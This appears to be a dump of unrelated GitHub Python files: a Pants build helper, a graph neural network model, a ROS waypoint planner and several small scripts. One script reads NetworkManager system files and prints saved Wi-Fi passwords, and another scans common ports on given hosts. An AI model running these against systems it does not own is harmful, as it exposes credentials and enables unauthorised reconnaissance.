Target) -> None:\n dump_source = self._create_source_dumper(tgt)\n self._log.debug(f\" Dumping sources: {tgt}\")\n for relpath in tgt.sources_relative_to_buildroot():\n try:\n dump_source(relpath)\n except OSError:\n self._log.error(f\"Failed to copy {relpath} for target {tgt.address.spec}\")\n raise\n\n if getattr(tgt, \"_resource_target_specs\", None) or getattr(\n tgt, \"_synthetic_resources_target\", None\n ):\n # No one should be on old-style resources any more. And if they are,\n # switching to the new python pipeline will be a great opportunity to fix that.\n raise TaskError(\n f\"Old-style resources not supported for target {tgt.address.spec}. Depend on resources() \"\n \"targets instead.\"\n )\n\n def _prepare_inits(self) -> Set[str]:\n chroot = self._builder.chroot()\n sources = chroot.get(\"source\") | chroot.get(\"resource\")\n missing_init_files = identify_missing_init_files(sources)\n if missing_init_files:\n with temporary_file(permissions=0o644) as ns_package:\n ns_package.write(\n b'__import__(\"pkg_resources\").declare_namespace(__name__) # type: ignore[attr-defined]'\n )\n ns_package.flush()\n for missing_init_file in missing_init_files:\n self._all_added_sources_resources.append(Path(missing_init_file))\n self._builder.add_source(\n filename=ns_package.name, env_filename=missing_init_file\n )\n return missing_init_files\n\n def set_emit_warnings(self, emit_warnings):\n self._builder.info.emit_warnings = emit_warnings\n\n def _set_major_minor_interpreter_constraint_for_ipex(\n self, info: PexInfo, identity: PythonIdentity,\n ) -> PexInfo:\n interpreter_name = identity.requirement.name\n major, minor, _patch = identity.version\n major_minor_only_constraint = f\"{interpreter_name}=={major}.{minor}.*\"\n return ipex_launcher.modify_pex_info(\n info, interpreter_constraints=[str(major_minor_only_constraint)]\n )\n\n def _shuffle_underlying_pex_builder(self) -> Tuple[PexInfo, Path]:\n \"\"\"Replace the original builder with a new one, and just pull files from the old chroot.\"\"\"\n # Ensure that (the interpreter selected to resolve requirements when the ipex is first run) is\n # (the exact same interpreter we used to resolve those requirements here). This is the only (?)\n # way to ensure that the ipex bootstrap uses the *exact* same interpreter version.\n self._builder.info = self._set_major_minor_interpreter_constraint_for_ipex(\n self._builder.info, self._builder.interpreter.identity\n )\n\n # Remove all the original top-level requirements in favor of the transitive == requirements.\n self._builder.info = ipex_launcher.modify_pex_info(self._builder.info, requirements=[])\n transitive_reqs = [dist.as_requirement() for dist in self._distributions.values()]\n self.add_direct_requirements(transitive_reqs)\n\n orig_info = self._builder.info.copy()\n\n orig_chroot = self._builder.chroot()\n\n # Mutate the PexBuilder object which is manipulated by this subsystem.\n self._builder = PEXBuilder(interpreter=self._builder.interpreter)\n self._builder.info = self._set_major_minor_interpreter_constraint_for_ipex(\n self._builder.info, self._builder.interpreter.identity\n )\n\n self._distributions = {}\n\n return (orig_info, Path(orig_chroot.path()))\n\n def _shuffle_original_build_info_into_ipex(self):\n \"\"\"Create a \"dehydrated\" ipex file without any of its requirements, and specify that in two.\n\n *-INFO files.\n\n See ipex_launcher.py for details of how these files are used.\n \"\"\"\n orig_pex_info, orig_chroot = self._shuffle_underlying_pex_builder()\n\n # Gather information needed to create IPEX-INFO.\n all_code = [str(src) for src in self._all_added_sources_resources]\n prefixed_code_paths = [os.path.join(ipex_launcher.APP_CODE_PREFIX, src) for src in all_code]\n for src, prefixed in zip(all_code, prefixed_code_paths):\n # NB: Need to add under 'source' label for `self._prepare_inits()` to pick it up!\n self._builder.chroot().copy(\n os.path.join(str(orig_chroot), src), prefixed, label=\"source\"\n )\n\n python_repos = self._python_repos_subsystem\n python_setup = self._python_setup_subsystem\n\n # NB: self._all_find_links is updated on every call to self._resolve_multi(), and therefore\n # includes all of the links from python_repos.repos, as well as any links added within any\n # individual requirements from that resolve.\n\n resolver_settings = dict(\n indexes=list(python_repos.indexes),\n find_links=list(self._all_find_links),\n allow_prereleases=UnsetBool.coerce_bool(\n python_setup.resolver_allow_prereleases, default=True\n ),\n manylinux=python_setup.manylinux,\n )\n\n # IPEX-INFO: A json mapping interpreted in ipex_launcher.py:\n # {\n # \"code\": [],\n # \"resolver_settings\": {},\n # }\n ipex_info = dict(code=prefixed_code_paths, resolver_settings=resolver_settings,)\n with temporary_file(permissions=0o644) as ipex_info_file:\n ipex_info_file.write(json.dumps(ipex_info).encode())\n ipex_info_file.flush()\n self._builder.add_resource(filename=ipex_info_file.name, env_filename=\"IPEX-INFO\")\n\n # BOOTSTRAP-PEX-INFO: The original PEX-INFO, which should be the PEX-INFO in the hydrated .pex\n # file that is generated when the .ipex is first executed.\n with temporary_file(permissions=0o644) as bootstrap_pex_info_file:\n bootstrap_pex_info_file.write(orig_pex_info.dump().encode())\n bootstrap_pex_info_file.flush()\n self._builder.add_resource(\n filename=bootstrap_pex_info_file.name, env_filename=\"BOOTSTRAP-PEX-INFO\"\n )\n\n # ipex.py: The special bootstrap script to hydrate the .ipex with the fully resolved\n # requirements when it is first executed.\n # Extract the file contents of our custom app launcher script from the pants package.\n parent_module = module_dirname(module_dirname(ipex_launcher.__name__))\n ipex_launcher_provider = get_provider(parent_module)\n ipex_launcher_script = ipex_launcher_provider.get_resource_string(\n parent_module, \"ipex/ipex_launcher.py\"\n )\n with temporary_file(permissions=0o644) as ipex_launcher_file:\n ipex_launcher_file.write(ipex_launcher_script)\n ipex_launcher_file.flush()\n # Our .ipex file will use our custom app launcher!\n self._builder.set_executable(ipex_launcher_file.name, env_filename=\"ipex.py\")\n\n # The PEX-INFO we generate shouldn't have any requirements (except pex itself), or they will\n # fail to bootstrap because they were unable to find those distributions. Instead, the .pex file\n # produced when the .ipex is first executed will read and resolve all those requirements from\n # the BOOTSTRAP-PEX-INFO.\n self.add_resolved_requirements(\n [self._pex_requirement, self._setuptools_requirement],\n override_ipex_build_do_actually_add_distribution=True,\n )\n\n def freeze(self) -> None:\n if self._frozen:\n return\n\n if self._prepare_inits():\n dist = self._distributions.get(\"setuptools\")\n if not dist:\n self.add_resolved_requirements([self._setuptools_requirement])\n\n if self._generate_ipex:\n self._shuffle_original_build_info_into_ipex()\n\n self._builder.freeze(bytecode_compile=False)\n self._frozen = True\n\n def set_entry_point(self, entry_point):\n self._builder.set_entry_point(entry_point)\n\n def build(self, safe_path):\n self.freeze()\n self._builder.build(safe_path, bytecode_compile=False, deterministic_timestamp=True)\n\n def set_shebang(self, shebang):\n self._builder.set_shebang(shebang)\n\n def add_interpreter_constraint(self, constraint):\n self._builder.add_interpreter_constraint(constraint)\n\n def add_interpreter_constraints_from(self, constraint_tgts):\n # TODO this would be a great place to validate the constraints and present a good error message\n # if they are incompatible because all the sources of the constraints are available.\n # See: https://github.com/pantsbuild/pex/blob/584b6e367939d24bc28aa9fa36eb911c8297dac8/pex/interpreter_constraints.py\n constraint_tuples = {\n self._python_setup_subsystem.compatibility_or_constraints(tgt.compatibility)\n for tgt in constraint_tgts\n }\n for constraint_tuple in constraint_tuples:\n for constraint in constraint_tuple:\n self.add_interpreter_constraint(constraint)\n\n def add_direct_requirements(self, reqs):\n for req in reqs:\n self._builder.add_requirement(str(req))\n\n def add_distribution(self, dist):\n self._builder.add_distribution(dist)\n self._register_distribution(dist)\n\n def add_dist_location(self, location):\n self._builder.add_dist_location(location)\n dist = DistributionHelper.distribution_from_path(location)\n self._register_distribution(dist)\n\n def _register_distribution(self, dist):\n self._distributions[dist.key] = dist\n\n def set_script(self, script):\n self._builder.set_script(script)\n","repo_name":"mgrenonville/pants","sub_path":"src/python/pants/python/pex_build_util.py","file_name":"pex_build_util.py","file_ext":"py","file_size_in_byte":27457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"72"} +{"seq_id":"41507705276","text":"import torch\r\nimport torch.nn as nn\r\nimport numpy as np\r\nimport torch.nn.functional as F\r\nimport scipy.sparse as sp\r\n\r\n# Borrowed from https://github.com/PetarV-/DGI\r\nclass GCN(nn.Module):\r\n def __init__(self, in_ft, out_ft, bias=True):\r\n super(GCN, self).__init__()\r\n self.fc = nn.Linear(in_ft, out_ft, bias=False)\r\n self.act = nn.PReLU()\r\n self.to_q = nn.Linear(out_ft, out_ft, bias=False)\r\n self.to_k = nn.Linear(out_ft, out_ft, bias=False)\r\n self.to_v = nn.Sequential(nn.Linear(out_ft, out_ft, bias=False),\r\n nn.PReLU(),\r\n nn.Linear(out_ft, out_ft, bias=False)\r\n )\r\n self.attn = None\r\n if bias:\r\n self.bias = nn.Parameter(torch.FloatTensor(out_ft))\r\n self.bias.data.fill_(0.0)\r\n else:\r\n self.register_parameter('bias', None)\r\n\r\n for m in self.modules():\r\n self.weights_init(m)\r\n\r\n def weights_init(self, m):\r\n if isinstance(m, nn.Linear):\r\n torch.nn.init.xavier_uniform_(m.weight.data)\r\n if m.bias is not None:\r\n m.bias.data.fill_(0.0)\r\n\r\n # Shape of seq: (batch, nodes, features)\r\n def forward(self, seq, adj, sparse=False, attn=False, training=True):\r\n seq_fts = self.fc(seq)\r\n if sparse:\r\n out = torch.unsqueeze(torch.spmm(adj, torch.squeeze(seq_fts, 0)), 0)\r\n else:\r\n if attn:\r\n out = torch.bmm(adj, seq_fts)\r\n out_q = F.normalize(self.to_q(out), dim=-1)\r\n out_k = F.normalize(self.to_k(out), dim=-1)\r\n attn_mx = torch.einsum('bmd, bnd->bmn', (out_q, out_k))\r\n# attn_mx = torch.randn(adj.size()).cuda()\r\n div_loss = ((out_q - out_k)**2).sum(dim=-1).mean()\r\n \r\n zero_vec = -9e15*torch.ones_like(attn_mx)\r\n attention = torch.where(adj > 0, attn_mx, zero_vec)\r\n attention = F.softmax(attention, dim=-1)\r\n attention = F.dropout(attention, 0.1, training=training)\r\n out = self.to_v(torch.bmm(attention, out))\r\n return self.act(out), div_loss\r\n# out = torch.bmm(adj, seq_fts)\r\n# return self.act(out), 0\r\n else:\r\n out = torch.bmm(adj, seq_fts)\r\n return self.act(out)\r\n\r\n\r\n# Borrowed from https://github.com/PetarV-/DGI\r\nclass Readout(nn.Module):\r\n def __init__(self):\r\n super(Readout, self).__init__()\r\n\r\n def forward(self, seq, msk):\r\n if msk is None:\r\n return torch.mean(seq, 1)\r\n else:\r\n msk = torch.unsqueeze(msk, -1)\r\n return torch.mean(seq * msk, 1) / torch.sum(msk)\r\n\r\n\r\nclass Model(nn.Module):\r\n def __init__(self, n_in, n_h, projection=False):\r\n super(Model, self).__init__()\r\n self.gcn1 = GCN(n_in, n_h)\r\n self.gcn2 = GCN(n_in, n_h)\r\n self.read = Readout()\r\n\r\n self.sigm = nn.Sigmoid()\r\n self.new_dis = DIS(n_h, 256, projection)\r\n\r\n def forward(self, seq1, seq2, adj, diff, sparse, msk, samp_bias1, samp_bias2):\r\n h_1, div_loss = self.gcn1(seq1, adj, sparse, attn=True,training=True)\r\n c_1 = self.read(h_1, msk)\r\n c_1 = self.sigm(c_1)\r\n \r\n h_2 = self.gcn2(seq1, diff, sparse, attn=False)\r\n \r\n ret = self.new_dis(h_1, h_2)\r\n\r\n return ret, h_1, h_2, div_loss\r\n\r\n def embed(self, seq, adj, diff, sparse, msk):\r\n h_1, div_loss = self.gcn1(seq, adj, sparse, attn=True, training=False)\r\n h_2 = self.gcn2(seq, diff, sparse, attn=False)\r\n \r\n c = self.read(h_1, msk)\r\n return (h_1 + h_2).detach(), c.detach()\r\n\r\nclass LogReg(nn.Module):\r\n def __init__(self, ft_in, nb_classes):\r\n super(LogReg, self).__init__()\r\n self.fc = nn.Linear(ft_in, nb_classes)\r\n self.sigm = nn.Sigmoid()\r\n\r\n for m in self.modules():\r\n self.weights_init(m)\r\n\r\n def weights_init(self, m):\r\n if isinstance(m, nn.Linear):\r\n torch.nn.init.xavier_uniform_(m.weight.data)\r\n if m.bias is not None:\r\n m.bias.data.fill_(0.0)\r\n\r\n def forward(self, seq):\r\n ret = torch.log_softmax(self.fc(seq), dim=-1)\r\n return ret\r\n\r\nclass GEN(nn.Module):\r\n def __init__(self, out_dim, z_dim, contra_dim):\r\n super(GEN, self).__init__()\r\n self.gen = nn.Sequential(\r\n nn.Linear(out_dim+z_dim, out_dim, bias=False),\r\n nn.PReLU(),\r\n nn.Linear(out_dim, contra_dim, bias=False)\r\n )\r\n def forward(self, x, noise):\r\n \"\"\"\r\n :param x: batch * out_dim\r\n :param noise: batch * z_dim\r\n :return: batch * out_dim\r\n \"\"\"\r\n feature = torch.cat([x, noise], dim=-1)\r\n return self.gen(feature)\r\n\r\nclass DIS(nn.Module):\r\n def __init__(self, n_out, n_c, projection=False):\r\n super(DIS, self).__init__()\r\n# self.fc = nn.Linear(out_ft * 2, 1, bias=False)\r\n self.head = projection\r\n self.projection = nn.Sequential(\r\n nn.Linear(n_out, n_c),\r\n nn.PReLU(),\r\n nn.Linear(n_c, n_c)\r\n \r\n )\r\n def forward(self, graph1, graph2):\r\n if self.head:\r\n graph1 = self.projection(graph1)\r\n graph2 = self.projection(graph2)\r\n \r\n # B * N * N\r\n graph1 = F.normalize(graph1, dim=-1)\r\n graph2 = F.normalize(graph2, dim=-1)\r\n logits = torch.einsum('bnd, bmd->bnm', [graph1, graph2])\r\n return logits\r\n\r\n","repo_name":"Sherrylone/M-Mix","sub_path":"node/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":5716,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"72"} +{"seq_id":"2969831761","text":"import csv\nfrom anytree import Node, RenderTree, AsciiStyle\n\n\nclass ParentNodes:\n def __init__(self, node_file, answers_file_csv):\n self.node_file = node_file\n self.answers_file_csv = answers_file_csv\n\n def create_nodes(self):\n with open(self.node_file, \"r\") as csvfile:\n csvreader = csv.reader(csvfile)\n # skip the header row\n next(csvreader)\n # create a dictionary to store the nodes\n nodes = {}\n for row in csvreader:\n # create a new node with the ID and label from the CSV row\n node_id = int(row[0])\n node_label = row[1]\n node = Node(node_label, id=node_id)\n # add the node to the dictionary\n nodes[node_id] = node\n return nodes\n\n def add_answer_nodes(self, nodes):\n with open(self.answers_file_csv, \"r\") as csvfile:\n csvreader = csv.reader(csvfile)\n # skip the header row\n next(csvreader)\n for row in csvreader:\n # get the ID of the parent node and the label of the answer\n parent_id = int(row[0])\n answer_label = \"[R]: \" + row[1]\n # create a new node for the answer\n answer_node = Node(answer_label, id=parent_id)\n # get the parent node from the dictionary\n parent_node = nodes.get(parent_id)\n if parent_node:\n # add the answer node as a child of the parent node\n answer_node.parent = parent_node\n return nodes\n\n def display_nodes(self, menus):\n for node in menus.values():\n for pre, fill, n in RenderTree(node, style=AsciiStyle()):\n print(f\"({n.id}): {n.name}\")\n return None\n","repo_name":"ngelrojas/script_questions","sub_path":"builder_tree/parent_nodes.py","file_name":"parent_nodes.py","file_ext":"py","file_size_in_byte":1834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28619452687","text":"#\n# @lc app=leetcode id=347 lang=python3\n#\n# [347] Top K Frequent Elements\n#\n\n# @lc code=start\nclass Solution:\n def topKFrequent(self, nums: List[int], k: int) -> List[int]:\n nums_count = dict(Counter(nums))\n freq_value = defaultdict(list)\n for num, count in nums_count.items():\n freq_value[count].append(num)\n res = []\n for i in range(len(nums), -1, -1):\n if freq_value[i] != []:\n res.extend(freq_value[i])\n if len(res) == k:\n break\n return res\n\n\n# @lc code=end\n\n","repo_name":"Anderbone/leetcode","sub_path":"Python/347.top-k-frequent-elements.py","file_name":"347.top-k-frequent-elements.py","file_ext":"py","file_size_in_byte":580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27030660591","text":"import socket\n\nhosts = list()\nports = [20, 21, 22, 23, 25, 42, 43, 53, 67, 69, 80, 110, 115, 123, 137, 138,\n 139, 143, 161, 179, 443, 445, 514, 515, 993, 995, 1080, 1194, 1433,\n 1702, 1723, 3128, 3268, 3306, 3389, 5432, 5060, 5900, 5938, 8080,\n 10000, 20000]\n\nanswer = input('Указать адрес сайта (site) или путь к файлу (file): ')\n\nif answer == 'site':\n hosts.append(input('Введи имя сайта без http/https или IP-адрес: '))\nelse:\n pathFile = input('Введите полный путь к файлу: ')\n with open(pathFile, 'r', encoding='UTF-8') as f:\n for str in f:\n hosts.append(str.strip())\n\nprint(f'Хосты: {hosts}')\nprint('\\nОжидайте идёт сканирование!\\n')\n\nfor host in hosts:\n for port in ports:\n s = socket.socket()\n s.settimeout(1)\n\n try:\n s.connect((host, port))\n except socket.error:\n pass\n else:\n print(f'{host}: {port} порт активен')\n\n s.close()\n\nprint('\\nСканирование завершено!\\n')\n","repo_name":"Thr0TT1e/scaner-ports","sub_path":"scanerPorts.py","file_name":"scanerPorts.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28718643569","text":"import os\nimport argparse\nimport utils.WBAugmenter_Python.WBAugmenter.WBEmulator as wbAug\nfrom drfx.settings import BASE_DIR, MEDIA_ROOT, MEDIA_URL\n\ndef parse_args():\n parser = argparse.ArgumentParser(description=\"WB color augmenter\")\n p = parser.add_argument\n p(\"--input_image_filename\", help=\"Input image's full filename (for a single image augmentation)\")\n p(\"--input_image_dir\", help=\"Training image directory (use it for batch processing)\")\n p(\"--out_dir\", help=\"Output directory\")\n p(\"--out_number\", type=int, default=10, help=\"Number of output images for each input image\")\n p(\"--write_original\", type=int, default=1, help=\"Save copy of original image(s) in out_dir\")\n p(\"--ground_truth_dir\", help=\"Ground truth directory\")\n p(\"--out_ground_truth_dir\", help=\"Output directory for ground truth files\")\n p(\"--ground_truth_ext\", help=\"File extension of ground truth files\")\n return parser.parse_args()\n\ndef augment_images(**kwargs):\n wbColorAug = wbAug.WBEmulator() # create an instance of the WB emulator\n # args = parse_args() # parse input arguments\n args = {\n 'input_image_filename' : None,\n 'input_image_dir' : None,\n 'out_dir' : None,\n 'out_number' : 10,\n 'write_original' : 1,\n 'ground_truth_dir' : None,\n 'out_ground_truth_dir' : None,\n 'ground_truth_ext' : None,\n }\n\n args.update(kwargs)\n if args[\"input_image_dir\"] is not None and args[\"ground_truth_dir\"] is not None: # if input and ground truth directories are provided, augment training/ground truth files\n if args[\"out_dir\"] is None:\n args[\"out_dir\"] = MEDIA_ROOT + \"/training_new\"\n if args[\"out_ground_truth_dir\"] is None:\n args[\"out_ground_truth_dir\"] = MEDIA_ROOT + \"/ground_truth_new\"\n os.makedirs(args[\"out_dir\"], exist_ok=True) # create output training directory (if not exist)\n os.makedirs(args[\"out_ground_truth_dir\"], exist_ok=True) # create output ground truth directory (if not exist)\n wbColorAug.trainingGT_processing(args[\"input_image_dir\"], args[\"out_dir\"], args[\"ground_truth_dir\"],\n args[\"out_ground_truth_dir\"], args[\"ground_truth_ext\"], args[\"out_number\"],\n args[\"write_original\"])\n elif args[\"input_image_dir\"] is not None: # if input directory provided, then do batch processing -- process all images inside this directory\n if args[\"out_dir\"] is None:\n args[\"out_dir\"] = MEDIA_ROOT + \"/results\"\n os.makedirs(args[\"out_dir\"], exist_ok=True) # create output directory (if not exist)\n wbColorAug.batch_processing(args[\"input_image_dir\"], args[\"out_dir\"], args[\"out_number\"], args[\"write_original\"])\n else: # process a single image\n if args[\"out_dir\"] is None:\n args[\"out_dir\"] = MEDIA_ROOT + \"/results\"\n os.makedirs(args[\"out_dir\"], exist_ok=True)\n paths = wbColorAug.single_image_processing(args[\"input_image_filename\"], args[\"out_dir\"], args[\"out_number\"],\n args[\"write_original\"])\n print(\"MEDIA_ROOT\", MEDIA_ROOT)\n print(\"MEDIA_URL\", MEDIA_URL)\n print(paths)\n return paths\n","repo_name":"polyedr/drfx_colour_augmenter","sub_path":"utils/WBAugmenter_Python/wbAug.py","file_name":"wbAug.py","file_ext":"py","file_size_in_byte":3284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17129790189","text":"def solution(keymap, targets):\n answer = []\n key_dict = {}\n for keys in keymap:\n for i, key in enumerate(keys):\n if key not in key_dict or key_dict[key] > i+1:\n key_dict[key] = i+1\n \n for target in targets:\n count = 0\n for c in target:\n if c not in key_dict:\n count = -1\n break\n \n count += key_dict[c]\n answer.append(count)\n \n return answer","repo_name":"hogiljung/Algorithms","sub_path":"프로그래머스/unrated/160586. 대충 만든 자판/대충 만든 자판.py","file_name":"대충 만든 자판.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71905058152","text":"#!/usr/bin/python3\nimport configparser\nimport os\n\nconfig = configparser.ConfigParser()\n\nprofiles =[]\npath = \"/etc/NetworkManager/system-connections/\"\nfiles= os.listdir(path)\n\n \nif(len(files)>0):\n for file in files:\n fullPath = os.path.join(path,file)\n config.read(fullPath)\n sections = config.sections()\n if(len(sections)>0):\n for f in range(len(sections)):\n temp ={}\n if(\"wifi-security\"== sections[f]):\n data = config[sections[f]]\n for key in data:\n value = config[sections[f]][key]\n temp[key] = value\n temp[\"ssid\"] = config[\"wifi\"][\"ssid\"]\n profiles.append(temp)\n \n \n\n\n# Print out the password\n\nprint(\"auth-alg\"+\" \"*20,\"ssid\"+\" \"*20,\"key-mgmt\"+\" \"*20,\"psk\"+\" \"*20)\nfor dic in range(len(profiles)):\n print(\"{:28} {:28} {:28} {:28}\".format(profiles[dic]['auth-alg'],profiles[dic]['ssid'],profiles[dic]['key-mgmt'],profiles[dic]['psk']))\n \n \n \n \n \n \n ","repo_name":"LIBERTY-D/data-scraper","sub_path":"linux_wifi.py","file_name":"linux_wifi.py","file_ext":"py","file_size_in_byte":1190,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"30313907810","text":"#!/usr/bin/python3\n\nimport math\nimport json\nimport random\nimport rospy\nimport copy\nfrom geometry_msgs.msg import PoseStamped, PoseWithCovarianceStamped,PoseArray\nfrom nav_msgs.msg import Path\nfrom std_msgs.msg import Bool\nfrom node_astar import *\n\nclass LocalGoalCreator:\n def __init__(self):\n rospy.init_node('WaypointCreator', anonymous=True)\n\n # param\n self.HZ = rospy.get_param(\"~HZ\", 10)\n self.WORLD_FRAME = rospy.get_param(\"~WORLD_FRAME\", 'map')\n self.ROBOT_FRAME = rospy.get_param(\"~ROBOT_FRAME\", 'base_link')\n # self.GOAL_DIS_TOLERANCE = rospy.get_param(\"~GOAL_DIS_TOLERANCE\", 0.3)\n # self.GOAL_YAW_TOLERANCE = rospy.get_param(\"~GOAL_YAW_TOLERANCE\", 1.0)\n # self.TIMEOUT = rospy.get_param(\"~TIMEOUT\", 180)\n\n self.estimated_pose_sub = rospy.Subscriber('/amcl_pose',PoseWithCovarianceStamped,self.estimated_pose_call_back)\n # self.global_goal_sub = rospy.Subscriber('/goal_reach',Bool,self.goal_reach_call_back)\n\n WAYPOINTS_PATH = rospy.get_param(\"~WAYPOINTS_PATH\",'/home/amsl/catkin_ws/src/global_path_creator/waypoints/waypoints.json')\n with open(WAYPOINTS_PATH) as f:\n waypoints_data = json.load(f)\n self.waypoints = []\n for wp in waypoints_data[\"WAYPOINTS\"]:\n self.waypoints.append([wp[\"x\"], wp[\"y\"], wp[\"yaw\"]])\n self.idx = 0\n\n # publisher\n self.waypoint_pub = rospy.Publisher('/waypoint', Path, queue_size=10)\n\n self.start_time = rospy.Time.now()\n self.goal_reach = True\n self.estimated_pose = PoseWithCovarianceStamped()\n self.global_goal_x = 0\n self.global_goal_y = 0\n\n self.maze = [[0, 0, 0, 0, 0],\n [0, 1, 0, 1, 0],\n [0, 0, 0, 0, 0],\n [0, 1, 0, 1, 0],\n [0, 0, 0, 0, 0]]\n self.split = 10\n self.set_node()\n self.global_path = Path()\n def set_node(self):\n # 218\n # 307\n # 456\n id0 = (2,2)\n id1 = (2,4)\n id2 = (0,4)\n id3 = (0,2)\n id4 = (0,0)\n id5 = (2,0)\n id6 = (0,4)\n id7 = (4,2)\n id8 = (4,4)\n self.id_list = [id0,id1,id2,id3,id4,id5,id6,id7,id8]\n\n def goal_callabck(self, data):\n self.goal = data\n print(\"next goal: \")\n print(self.goal)\n self.start_time = rospy.Time.now()\n\n # def goal_reach_call_back(self,msg):\n # self.goal_reach = msg.data\n\n def estimated_pose_call_back(self,msg):\n\n self.estimated_pose = msg\n\n def next_waypoint(self):\n next_waypoint = PoseStamped()\n next_waypoint.header.frame_id = self.WORLD_FRAME\n ex = self.estimated_pose.pose.pose.position.x\n ey = self.estimated_pose.pose.pose.position.y\n waypoint_dis = 0\n next_waypoint_id = 0\n min_waypoint_id = 0\n next_waypoint_list = []\n max_dis = 1e5\n min_waypoint = 0\n path_id = []\n waypoint_size = len(self.waypoints)\n\n for i in range(waypoint_size):\n waypoint_dis = math.sqrt((ex - self.waypoints[i][0]) ** 2 + (ey - self.waypoints[i][1]) ** 2)\n if waypoint_dis > 15.0:\n next_waypoint_list.append(i)\n if waypoint_dis < max_dis:\n max_dis = waypoint_dis\n next_waypoint_id = i\n if waypoint_dis > min_waypoint:\n min_waypoint = waypoint_dis\n min_waypoint_id = i\n\n if len(next_waypoint_list) == 0:\n next_waypoint.pose.position.x = self.waypoints[next_waypoint_id][0]\n next_waypoint.pose.position.y = self.waypoints[next_waypoint_id][1]\n else:\n next_waypoihnt_id = random.choice(next_waypoint_list)\n next_waypoint.pose.position.x = self.waypoints[next_waypoihnt_id][0]\n next_waypoint.pose.position.y = self.waypoints[next_waypoihnt_id][1]\n\n path = astar(self.maze,self.id_list[min_waypoint_id],self.id_list[next_waypoint_id])\n # print(path)\n for i in path:\n for idx,id in enumerate(self.id_list):\n if id == i:\n path_id.append(idx)\n # if(self.reach_goal):\n self.local_goal_creator(path_id)\n\n def local_goal_creator(self,path_id):\n self.global_path = Path()\n path_id.reverse()\n path_point = PoseStamped()\n path_point.header.frame_id = \"map\"\n for i in range(len(path_id)-1):\n x1 = self.waypoints[path_id[i]][0]\n x2 = self.waypoints[path_id[i+1]][0]\n y1 = self.waypoints[path_id[i]][1]\n y2 = self.waypoints[path_id[i+1]][1]\n\n if (x2 - x1) != 0:\n a = (y2 - y1) / (x2 - x1)\n\n # else:\n # a = x1\n b = y1 - a*x1\n split = (x2 - x1)/self.split\n path_point.pose.position.x = self.waypoints[path_id[i]][0]\n path_point.pose.position.y = self.waypoints[path_id[i]][1]\n self.global_path.poses.append(copy.deepcopy(path_point))\n add_split = split\n for i in range(self.split):\n y = a * (add_split + x1) + b\n x = add_split + x1\n path_point.pose.position.x = x\n path_point.pose.position.y = y\n self.global_path.poses.append(copy.deepcopy(path_point))\n add_split += split\n path_point.pose.position.x = self.waypoints[path_id[-1]][0]\n path_point.pose.position.y = self.waypoints[path_id[-1]][1]\n self.global_path.poses.append(copy.deepcopy(path_point))\n self.global_path.header.frame_id = \"map\"\n # print(global_path.poses)\n # self.waypoint_pub.publish(global_path)\n self.global_goal_x = path_point.pose.position.x\n self.global_goal_y = path_point.pose.position.y\n\n def check_goal_reach(self):\n cx = self.estimated_pose.pose.pose.position.x\n cy = self.estimated_pose.pose.pose.position.y\n gx = self.global_goal_x\n gy = self.global_goal_y\n dis = math.sqrt((gx - cx) ** 2 + (gy -cy) ** 2)\n # print(dis)\n if dis < 1.0:\n self.goal_reach = True\n else:\n self.goal_reach = False\n\n def process(self):\n r = rospy.Rate(self.HZ)\n while not rospy.is_shutdown():\n if self.goal_reach:\n self.next_waypoint()\n self.check_goal_reach()\n self.waypoint_pub.publish(self.global_path)\n r.sleep()\n\nif __name__ == '__main__':\n local_goal_creator = LocalGoalCreator()\n try:\n local_goal_creator.process()\n except rospy.ROSInterruptException:\n pass\n","repo_name":"hirotakasaito/random_goal_creator","sub_path":"script/waypoint_creator.py","file_name":"waypoint_creator.py","file_ext":"py","file_size_in_byte":6701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"392545536","text":"import os\r\nimport shutil\r\nimport pandas as pd\r\nimport numpy as np\r\nimport pyemu\r\nimport flopy\r\nimport platform\r\n\r\nversion = 'mf2005'\r\nworking_dir = '.'\r\n\r\nif platform.system() == 'Windows':\r\n exe_name = r'D:\\Work\\exec_Win\\MF2005.1_12\\bin\\mf2005dbl'\r\n exe_name += '.exe'\r\nelse:\r\n exe_name = '/Volumes/A_2TB/Work/exec_Mac/mf2005dbl'\r\n\r\n#m = flopy.modflow.Modflow.load('name.nam',model_ws=working_dir,load_only=[])\r\nm = flopy.modflow.Modflow.load('name.nam',model_ws=working_dir,exe_name=exe_name,\r\n version=version,check=False)\r\n\r\n#os.chdir('all_layers')\r\nfor lay in range(m.nlay):\r\n pp_file = 'hk'+str(lay)+'pp.dat'\r\n factors_file = 'hk'+str(lay)+'pp.dat.fac'\r\n out_file = 'arrays/hk_Layer_'+str(lay)+'.ref'\r\n fill_value = 1e+1\r\n pyemu.utils.geostats.fac2real(pp_file=pp_file,factors_file=factors_file,\r\n out_file=out_file,fill_value=fill_value)\r\n\r\n#os.chdir('..')\r\n\r\nexe_name = 'mf2005dbl'\r\nnam_file = 'name.nam'\r\n\r\n#pyemu.helpers.run('mf2005 parent.nam >_mf2005.stdout')\r\npyemu.helpers.run('{0} {1}'.format(exe_name,nam_file))","repo_name":"rj678/pyEMU_examples","sub_path":"MRGB/Notebooks/pilot_points_1/MF2005_dbl/forward_run.py","file_name":"forward_run.py","file_ext":"py","file_size_in_byte":1113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1702564690","text":"import csv\nfrom calais import Calais\nimport utilities\n\ncalais_api = 'placeholder key'\ncalais = Calais(calais_api, submitter='journo-calais-study')\n\nitr = 16\nwhile itr <= 16:\n journo_filename ='C:/Users/Naironi/Documents/School Docs 6/SocNet/feb' + str(itr) + '.txt'\n journo_file = open(journo_filename, 'r')\n journolist = journo_file.readlines()\n\n 